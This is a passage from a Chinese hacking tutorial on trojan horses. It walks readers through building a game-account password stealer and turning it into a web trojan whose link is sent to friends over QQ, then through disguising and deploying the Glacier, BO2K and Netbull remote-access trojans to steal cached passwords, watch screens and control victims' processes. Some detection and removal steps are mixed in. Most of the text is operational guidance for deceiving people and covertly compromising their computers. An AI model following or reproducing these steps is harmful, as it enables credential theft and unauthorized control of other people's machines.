如图3-26所示。在会员名输入框里填入刚才注册成功的会员名testOOl,然后点选【生成服务器】按钮即可。如果用户名填写正确的话，那就会出现生成木马成功的提示。图3-23木马配置程序图3-24进行会员注册图3-25填写注册资料再返回到如图3-23所示的“D:\木马配置”目录，出现如图3-27所示。比较图3-23和图3-27,会发现该目录下已经多出了另外一个文件consoleserver.exe该文件就是为自己生成的专用木马这个木马程序中已经捆绑了自己的用户名，以后该木马程序所截取的帐号密码信会自动分到自己的会员名下。图3-26生成服务器图3-27生成木马之后该程序只有19K,可以通过各种方式进行种植，当然了，如果对木马熟悉的话，也可在本机运行，该程序运行后无任何提示，自动隐藏到后台监视并截取游戏帐号密码。木马工作的基本原理：所有的木马都必须运行后才可以发挥截取密码的作用，如果只是配置好了木马就以为可以收信，那就错了，简单地说，如果想收信就必须保证木马在运行，所以要想办法让自己的木马运行起来。值得注意的是，网页木马需要有虚拟主机空间存放，并且需要支持ASP脚本语言，如果有的话最好不过了，如果没有，那就得自己去想办法弄个ASP空间，申请免费ASP空间并不一定支持上传可执行程序，所以急用的朋友可以自己想办法去弄个临时空间存放。执行exe2bmp.exe文件，出现如图3-28所示的画面，然后选择已经配置好的木马路径地址，点击【生成】按钮即可，生成工具会在自己的木马相应路径下生成3个相应文件：bintext.bmpbintext.htm和bintext.asp。用户只要把bintext.htm改成如love.htm或index.htm等好记或好听的文件名，这样更能迷惑来浏览该页面的人。大家看到如图3-29所示的这3个被红线圈中的文件了吗？这3个文件就构成了网页木马。将这3个文件上传到自己的ASP空间，然后将consoleserver.htm相应的网页地址记下来，这个地址以后可以在QQ上发放给一些自己认为可以下毒手的朋友，只要对方浏览了该文件，那么对方的电脑就会自动种上该专用木马了（注意是这3个文件必须都在同一个空间目录，而且缺一不可）。图3-28执行exe2bmp.exe文件其实consoleserver.bmp实际上就是转变后的木马文件，还有就是consoleserver.hmp和consoleserver.asp最好不要变更名称，如果要变更名称，那最好也相应改变代码里的链接文件名称。假设有人已经种了自己的木马，那如何查看自己的“马儿”所截取来的密码呢？现在进入下一个步骤——如何接收密码信件？首先访问首页，在登陆框里填入申请好的帐号和密码登陆后，网站会弹出一个窗口，该窗口显示的是自己的会员信息，如果需要修改密码可以在此页面修改。如果要查看密码，可以直接关闭该信息窗口，切换到刚才登陆的窗口，如图3-30所示。如果是用自己的帐号进行登录的，则显示的欢迎信息将会有所不同，如图3-30所示。请注意下面的会员区比登陆前多了几个链接，选择【木马工作结果查询】后进入工作结果查询页面，如图3-31所示。图3-29网页木马文件图3-30选择【木马工作结果查询】图3-31木马结果查询请大家注意查询日期，必须是规范格式，还有必须选择查询的密码所属游戏类型，再单击【查询】按钮，这样，最终结果就会显示在自己面前了。该页面还有一些删除记录链接，用户可以根据自己的需要使用。3-3-3创建与目标计算机木马程序的连接在完成上面所述的搜索以后，就可以与目标计算机的木马服务器程序建立连接了，如图3-32所示。这时就需要在【当前连接】中选择搜索到符合要求的IP地址，然后输入访问口令，怎么样，是不是已经与目标计算机建立连接了？不过，由于上面讲到的方法是在不知道目标计算机IP地址的情况下使用的。如果已经知道了目标计算机的IP地址，并且知道了它的访问密码，那么，就可以直接将该目标计算机添加到客户端中了。下面再来看一下直接添加中“冰河”计算机的操作步骤：在主窗口中直接单击按钮或在菜单选择【开始】一【添加主机】命令，将弹出【添加计算机】对话框，如图3-33所示。图3-32与木马服务器程序建立连接图3-33【添加计算机】对话框根据对话框提示输入【显示名称】【主机地址】（即目标计算机的IP地址）以及【访问口令】等内容，最后在单击【确定】按钮后，就可以看到这个IP地址已经被添加到“冰河”客户端程序的【文件管理器】选项卡中了。【注意】在本书后面的讲解中，笔者还会讲述到“冰河”的其他版本，为什么这样讲呢？一个是这个木马程序太出名了，网上遍地都是；二是对不同版本介绍后，好让读者有一个比较。3-4常用木马例说下面来剖析几个常用的木马，希望大家能够对其有一个深入的认识。3-4-1冰河木马的远程控制技术首先到网上下载一个"冰河"软件（这里下载的是"冰河V2.2"），解压后将看到三个文件：G_Server.exe、G_Client.exe、Readme.txt。G_Server.exe是被控端软件，用来安装在别人电脑里的文件，可以任意更名，双击没有任何反映，但其实已经悄悄的安装在电脑中了°G_Client.exe是控制端软件，也就是安装在自己电脑中的软件，用来监控别人的电脑。Readme.txt就不用说了。可以通过E-mail或QQ将传给别人并G_Server.exe文件安装到他的机器中，如果怕别人不接受，则还可以将其更名为MM.exe或Love.exe，然后骗他说，这是很好玩的东东，他一双击就搞定了。另外还可以用文件合并工具把一个很好玩的游戏程序文件和G_Server.exe文件合并，然后再传给他，在别人双击玩游戏的同时‘G_Server.exe文件也就悄悄安装好了。配置被控端程序在传输G_Server.exe文件前，还要利用G_Client.exe文件对其进行一些配置。双击G_Client.exe文件，将弹出如图3-34所示的程序界面，接着进行如下操作：图3-34程序界面在G_Client.exe程序主界面，单击【配置本地服务器程序】按钮。在弹出来的【服务器配置】对话框中点选【邮件通知】选项卡，然后填入E-mail地址和发送服务器，如图3-35所示，这样被控端软件将每次拨号后产生的IP地址都发送到自己设定的E-mail中。因为现在很多用户采用拨号上网或者采用动态IP的ADSL宽带上网，每次拨号后的IP都不一样。但有了这一步的设置，只要对方一开机上网，就能获得其IP并连接到他电脑了。单击【基本设置】选项卡，在其中设定一个访问口令，这样只有通过此口令才能访问到被控端的电脑，防止别的装有“冰河”控制端的用户访问，如图3-36所示。图3-35输入E-mail地址和发送服务器图3-36设定访问口令、“"'选中“自动删除安装文件”项“丿”选中“自动删除安装文件”，则被控端软件安装后将自动把原安装文件删除掉，不留任何痕迹。最后按【确定】按钮，被控端软件就配置好了。当然，还有一些无关重要的选项，如果需要则可以根据自己的实际情况酌情设置，如可以更改监听端口（范围在1024~32768之间）。搜索并远控目标电脑除了从E-mail中得到IP地址外，还可以通过控制端软件进行自动搜索（也可以使用其它搜索工具）具体操作步骤如下：（1） 单击主界面中的【自动搜索】按钮，在弹出的对话框中输入起始域和起止地址，如搜索到55之间的IP地址，则可以在“起始域”中输入192.168.0，在“起始地址”中输入1，“终止地址”中输入255。（2） 然后单击【开始搜索】按钮即可，如图3-37所示。“搜索结果”框中以“OK”开头的IP就可能是自己要找的了，控制端软件将会自动将其添加到文件管理器中，因为互联网上感染冰河木马的不只是一台电脑，搜索到的很可能是别人中下的木马，此时就得根据自己设定的口令验证了。那么，应该如何进行远控目标电脑呢？不妨进行如下步骤的操作：单击【自动搜索】按钮，在弹出来的“搜索计算机”对话框中输入“起始域”、起止地址（监听端口一般默认为7626，不用管），然后单击【开始搜索】按钮，搜索完毕单击【关闭】按钮即可。图3-37设置搜索范围并进行搜索在“文件管理”框中，选择一台自动添加进来的电脑IP，然后在“访问口令”框中输入设定的口令，单击【应用】按钮，如图3-38所示。如果能够访问电脑中的文件，则证明这台电脑就是自己的目标电脑。这样就可以在别人的电脑上“胡作非为”了！图3-38输入设定的口令并单击【应用】按钮当然了，如果通过别的途径得到了被控端的IP地址，则可以直接单击【添加主机】按钮，然后在弹出来的对话框中输入IP地址和访问口令，如图3-39所示，点按【确定】按钮即可。除了在【文件管理器】标签中访问、上传、下载文件外，在【命令控制台】标签中还能获取系统信息、获得各种口令、关机、重启、访问编辑注册表等各种操作如图3-40所示，单击【口令类命令】一【系统信息及口令】命令项，然后单击【系统信息】按钮便能查看到被控端电脑的系统信息，单击【开机口令】按钮便能查看到被控端电脑的开机口令，单击【缓存口令】按钮便能查看到被控端电脑上的各种共享访问口令。图3-39直接添加主机图3-40单击【系统信息】按钮其中最有意思的莫过于“捕获屏幕”功能了，单击【控制类命令】一【捕获屏幕】命令，然后单击右边的【查看屏幕】按钮便能查看被控端的当前屏，如图3-41所示幕，如果单击【屏幕控制】项，则被控端的一举一动自己都可以看见，并且还能对其进行操作，当然了，最好还是不要操作，要被发现那就会“惹火上身”了。如何将“冰河”木马卸载和清除“冰河”木马在目标电脑上装上去后，如果控制端要卸载，操作非常简单，在【命令控制台】标签中单击【控制类命令】一【系统控制】命令，然后单击右边的【自动卸载冰河】按钮即可，如图3-42所示。图3-41捕获屏幕功能图3-42卸载“冰河”假如自己的电脑感染了冰河木马（像Norton、金山毒霸等杀毒软件都可以查到），可以通过以下方法清除：以安全模式重新启动计算机。检 查 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 和HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices两处是否有同名的可疑程序名（默认安装为kernel32.exe）如果有则删除该键＞检查HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command处的键值是否为“\notepad.exe%1”（是指自己的Windows所在目录，如"c:\windows"）,"冰河"的默认设置是将该处键值修改为"sysexplr.exe%1"，请自行作相应修正。检查HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command处的键值是否为“"％1"%*”，如果不是则进行修正。删除找到的可疑程序（默认文件名目录下的"kernel32.exe”和"sysexplr.exe”，如果"sysexplr.exe”因正在运行而无法删除可以在第6步完成之后立即删除）如果是Windows9X系统，直接按两次【Ctrl+Alt+Del】快捷键重新启动计算机；若是NT系统，按【Ctrl+Alt+Del】快捷键激活【任务管理器】并结束kernel32.exe进程，然后重新启动计算机即可。最好还应该在修改注册表之后再删除可疑程序，否则对方如果将“冰河”设置为与EXE文件关联，那就连运行注册表编辑器的机会都没有了。另外在修改注册表时可能已经启动了与EXE文件关联的“冰河”，而“冰河”在正常关闭时将会再次修改注册表，所以在Windows9X系统下通过按【Ctrl+Alt+Del】快捷键来重新启动计算机是至关重要的一步。3-4-2剖析BackOrifice2000木马利用BO2K（BackOrifice2000，BO2000）木马可以通过互联网去控制远端机器的操作和取得信息，利用这个功能我们可以利用它搜集信息，执行系统命令，重新设置机器，重新定向网络等。只要远程机器执行了BO2K的服务端程序，就可以连接这部机器，利用它做为控制远程机器和搜集资料的工具。BO2K是根据Windows环境下的TCP/IP协议编写的，它支持多个网络协议，可以利用TCP或UDP来传送数据，还可以用XOR加密算法或更高级的3DES加密算法来对传送的数据进行加密。BackOrifice2000的使用（1）BO2K服务器端程序配置BO2K的图标如图3-43所示，在把BO2K的服务器端程序BO2K.EXE植入想要攻击的计算机（受控机）之前，需要对BO2K.EXE进行配置。BO2K服务器的配置相当简单，只要根据其配置向导进行选择就可以了。向导会指导用户进行几个设置，包括服务器文件名（可执行文件）网络协议（TCP或UDP）、端口、密码等。配置BO2K.EXE的步骤如下所示：用鼠标双击BO2K服务器配置程序bo2kcfg.exe文件，然后用鼠标单击【BO2K配置向导】中的【下一个】按钮，出现如图3-44所示的对话框，要求选择作为BO2K服务器的文件。选择好后单击【下一个】按钮；这时来到【网络类型】选择对话框，选择一个网络类型后单击【下一个】按钮；这时向导要求输入端口地址，如图3-45所示，在【挑选端口编号】文本输入框中输入一个端口编号，然后单击【下一个】按钮。图3-43BO2K的配置图标图3-44选择作为BO2K服务器的文件图3-45挑选端口编号这时向导要求选择【加密类型】，选择一种加密类型后，单击【下一个】按钮。接着向导要求输入口令，如图3-46所示。当在文本输入框中输入口令后，单击【下一个】按钮。已经可以看到向导提示配置完成，用鼠标单击【完成】按钮即可。出现如图3-47所示的【BO2K服务器配置】窗口，从这里可以对BO2K服务器文件进行更详细的设置。图3-46输入口令图3-47【BO2K服务器配置】窗口用鼠标单击【打开服务器】按钮，弹出【打开】对话框，选择要打开的BO2K服务器文件，如图3-48所示。图3-48选择要打开的BO2K服务器文件图3-49对服务器文件进行设置选择好以后，单击【打开】按钮，返回到【BO2K服务器配置对话框】窗口，可以对服务器文件进行设置，如图3-49所示。（2） BO2K客户端界面对BO2K的服务器端程序设置完成之后，可以利用各种方法把BO2K植入到想要监控的计算机中，然后就可以利用BO2K的客户端程序对远程中BO2K木马的计算机（称为受控机）进行监控了。打开BO2K客户端监控程序BO2KGUI.EXE，它的服务器列表和服务器命令可以任意拖拽、组合，客户端的背景也有内定选项提供。（3） BO2K的控制操作等服务器程序配置完毕，再将它发送给对方，对方执行以后，就可以通过运行BO2K控制程序bo2kgui.exe来进行控制。具体操作步骤如下：用鼠标双击bo2kgui.exe文件，出现如图3-50所示的BO2K客户端监控程序窗口。图3-50BO2K客户端监控程序窗口用鼠标单击【文件】菜单下的【新服务器】选项，弹出【编辑服务器设定】对话框，如图3-51所示。在【服务器名字】和【服务器地址】文本输入框中输入正确的服务器名字和地址，然后再选择【连接类型】、【默认加密】和【证明】这三个下拉列表中的选项。一切设置好后，单击【好】按钮，出现［ServerCommandClient］操作框，如图3-52〜图3-55所示，这里BO2K的控制操作明显和现在使用的完全可视化控制操作不同，其命令的执行有点类似DOS环境下的操作。图3-51【编辑服务器设定】对话框图3-52控制操作图1图3-53控制操作图2图3-54控制操作图3请大家一定要熟记这些命令，BO2K的精华可都在这里面哦！！！BO2K的操作界面对初次使用木马的人来说根本摸不到头绪，更不要说怎么能用好它了，这点新手要了解。经常使用漏洞入侵的朋友都知道，收集肉鸡的口令信息，设置后门比较繁琐，不过现在好了，只要借用BO2K的部分功能就可轻松达到自己的目的。推荐大家使用BO2K是因为它对网络功能的支持非常稳定而且全面。2.BO2K的检测下面笔者介绍几种B02K木马的检测方法，木马的检测和清除一般都是在中了木马的计算机（受控机）上进行的。（1）联网监控法联网监控法实际上是检测所有木马程序的有效方法，但使用这种方法需要对网络知识有较深的了解，其操作步骤如下：打开Windows的D0S命令窗口。在DOS命令窗口中键入“netstat-a”命令，该命令的作用是监控本机的网络连接情况，显示网络协议及端口等信息，该命令的运行结果如图3-56所示。图3-55控制操作图4图3-56netstat-a命令在“netstat-a”命令的执行结果中，检查当前计算机是否有可疑端口开着，（这就要求用户对系统的默认端口比较熟悉）如果发现可疑端口，表明很有可能中木马了。如果BO2K使用UDP端口这个方法就不起作用了。（2）注册表检查法BO2K运行时必须修改注册表，因此可以根据它的这个特点抓到它的“狐狸尾巴”。被BO2K修改过的注册表应该包含下列特征：如果操作系统是Windows9X，那么下面的注册表将会被BO2K修改：［HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices］"UMGR32.EXE"="C:\\WINDOWS\\SYSTEM\\UMGR32.EXE”如果操作系统是WindowsNT或者Windows2000，则被BO2K修改的注册表项为：［HKEY_LOCAL_MACHINE］下的\SYSTEM\ControlSet001\Services\RemoteAdministrationService"Type"=00000110"Start"=00000002"ErrorControl"=00000000"ImagePath"=:C：\WINNT\System32\UMGR32.EXE”"DisplayName"="RemoteAdministrationService""ObjectName"="LocalSystem"［HKEY_LOCAIL_MACHINE］下的\SYSTEM\ControlSet001\Services\RemoteAdministrationService\Security"Security"=（一大串16进制码）［HKEY_LOCAIL_MACHINE］下的\SYSTEM\ControlSet00l\Services\RemoteAdministrationServicelEnum"0"="Root\LEGACY_REMOTEADMINISTRATIONSERVICE\0000""Count"=00000001"Nextlnstance"=00000001通过检查上述的注册表内容，可以检测出系统中是否中了BO2K木马。【注意】由于BO2K在WindowsNT或Windows2000中的进程里也是隐身的，所以，它就能够为进程多申请一些内存，然后自己寄生到这些内存中，使用户无法通过检测当前进程来找到它。3.BO2K的清除只要知道了BO2K的底细并找到了它的踪迹，要清除它就容易的很了。在Windows9X系统中清除BO2K木马的方法如下：重新启动计算机，在开机启动菜单中选择［commandpromptonly菜单项，进入纯DOS模式，在DOS命令行中删除文件名以UMGR32打头的文件，具体的命令格式为：delumgr*.*然后删除BO2K在注册表中增加的内容。在WindowsNT/2000系统中清楚BO2K木马的方法如下：按组合键Ctrl+Alt+Del，打开【Windows安全】对话框，在该对话框中单击【任务管理器】按钮，打开Windows任务管理器。在Windows任务管理器中单击［进程］选项卡，在【进程】选项卡中找到UMGR32.EXE的进程。选中之后，单击【结束进程】按钮，结束进程。然后打开注册表编辑器，在注册表编辑器中手工恢复被BO2K修改和增加的内容。删除系统中的UMGR32.EXE文件。使用修改注册表清除BO2K木马：注册表里[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]“UMGR32.EXE”=“C\:WINDOWS\SYSTEM\UMGR32.EXE”（就是它了），在删除umgr键值后，可以在Windows状态下直接删umgr32.exe源文件，不需要重新启动。对于BO2K的检测和清除，也可以使用常见的木马检测和清除工具来完成。3-4-3揭开“网络公牛（Netbull）”的面纱网络公牛（Netbull）是一个不带任何权限限制的远程控制软件，该软件在局域网和因特网上，甚至在无网络状态时仍可以用电话和Modem完成对服务器的控制。Netbull1.1版中的控制端的文件如图3-57所示。服务端大小为213K，改名后发给别人运行即可。双击打开网络公牛的客户端程序Peep.exe，如图3-58所示。连接后的基本操作与前面介绍的木马操作无明显差异。1．在服务器端配置程序在把网络公牛木马植入目标主机前，需要对它的服务器端程序做一些设置，方法如下：需要先在客户端程序Peep.exe的窗口中，选择菜单【配置服务器】一【设置】命令，打开如图3-59所示的【打开】对话框。图3-57Netbull1.1版中控制端的文件图3-58网络公牛的客户端程序的主窗口在【打开】对话框中，选择需要设置的网络公牛的服务器端程序，即PeepServer.exe，选择完成之后，再接着单击【打开】按钮，这时候就会出现图3-60所示的【服务器参数设置】对话框了。在【服务器参数设置】对话框中，可以设置自己需要发送Email的SMTP服务器和收取Email的邮箱地址。图3-59【打开】对话框图3-60【服务器参数设置】对话框这样一来，只要网络公牛能够植入目标主机，服务器端程序会自动把当前主机的IP地址发送到指定的邮箱中，而在该对话框中设置的邮箱就是用来接收IP地址的。在客户端连接服务器完成之后，还可以对服务器中的参数进行一些自己的设置。这时候运行buildserver.exe程序，则会在当前目录下产生一个newserver.exe文件，如图3-61所示，它就是网络公牛的服务器端程序。在这里可以把newserver.exe任意改为自己喜欢的名字，然后再通过某种手段把它植入目标主机。newserver.exe在服务器端运行后，会自动变成为文件checkdll.exe（即peepserver.exe），放在C:\Windows\system（Windows9X）或者C:\WINNT\system32（WindowsNT/2000）文件夹下。值得高兴的是，check.dll被设置成了开机而自动运行。网络公牛的服务器端程序在运行后会自动捆绑以下文件：在Windows9X中：notepad.exe，write.exe，regedit.exe，winmine.exe，winhelp.exe在WindowsNT/2000：notepad.exe，regedit.exe，reged32.exe，drwtsn32.exe，winmine.exe图3-61生成网络公牛的服务器端程序此外，服务器端程序还会捆绑在开机可自动运行的第三方软件上（如realplay.exe）。网络公牛的服务器端程序运行后，会自动向设置好的信箱发一封E-mail，告知服务器端程序开始运行的时间，以及目标主机的IP地址。并且，服务器端程序每隔10分钟查询一次目标主机的IP地址，当目标主机（受控机）的IP地址发生改变时，会发送E-mail进行通知。2．客户端的远程监控在把网络公牛的服务器端程序植入目标主机后，就可以使用客户端对目标主机进行监控了，具体监控操作步骤如下：双击网络公牛的客户端EXE文件Peep.exe，打开网络公牛监控窗口。在网络公牛监控窗口中，选择菜单【文件】一【增加主机】命令，打开图3-62所示的【连接】对话框，在该对话框中，输入主机名称（这个主机名称只是为了便于记忆，无实际用途），重点是要输入主机的IP地址，这里以53为例。连接设置完成之后，在【连接】对话框中单击【OK】按钮，客户端监控窗口如图3-63所示。图3-62【连接】对话框图3-63连接设置完成在网络公牛的客户端监控窗口中，主要的菜单是【命令选项】，如图3-64所示。【命令选项】菜单下包括了所有的监控命令，包括：连接：与服务器端程序连接的命令。断开连接：与服务器端程序断开连接的命令。控制台：得到目标主机信息的命令。浏览器：浏览目标主机文件系统的命令。捕获屏幕：查看目标主机当前屏幕内容的命令。因为所有监控命令都要在与目标主机连接之后才能执行，所以首先要与目标主机连接。这时候就需要在网络公牛客户端窗口中选择目标主机，选择菜单【命令选项】一【连接】命令，连接成功之后，给出连接成功或失败的提示，如图3-65所示。图3-64【命令选项】菜单图3-65提示连接失败或成功接着选择菜单【命令选项】一【控制台】命令，打开【控制台】对话框。在【控制台】对话框中，共有5个选项卡，包括：系统信息、消息、进程管理、查找、服务器在线修改。单击其中的【系统信息】选项卡，然后单击选项卡中的【系统信息】按钮，在【响应】文本框中会显示目标主机的系统信箱。通常情况下，在使用系统信息监控命令后，就会显示出目标主机的计算机名、CPU的类型、内存大小和使用百分比，操作系统的类型以及各硬盘驱动器的总容量和剩余容量。这时候如果看到硬盘驱动器的总容量和剩余容量的显示都有问题，则表明网络公牛不能正确地显示受控机上的硬盘使用情况。如果目标主机上这时候设置有缓存的密码，则在单击【获取密码】按钮后，在【响应】文本框中就会显示出所有缓存的密码。单击【消息】选项卡，然后在【消息】选项卡中输入消息的标题和内容，再单击【发送】按钮，在【响应】文本框中会显示消息发送的结果了。如果消息发送成功，这时在目标主机上就会弹出消息对话框。单击【进程管理】选项卡，在该选项卡中，可以对目标主机的进程进行管理。在【进程管理】选项卡中有列举进程、删除进程、创建进程3个进程管理的命令。单击【列举进程】按钮，在【响应】文本区中会显示目标主机上运行的所有进程，并且列出了各个进程的进程号，进程的名称以及进程所包含的线程个数。如果要删除目标主机上正在运行的某个进程首先要指定进程号可以在【响应】文本区中复制要关闭进程的进程号如删除的最后一个进程是SPOOL32把SPOOL32的进程号FFFC934D粘贴到【删除进程】按钮右边的文本框中，然后单击【删除进程】按钮，控制台就会提示进程是否被成功删除。如果想要在目标主机上创建一个新进程，需要指定新进程的名称。例如要在目标主机上打开画图工具的进程，就在【创建进程】按钮右边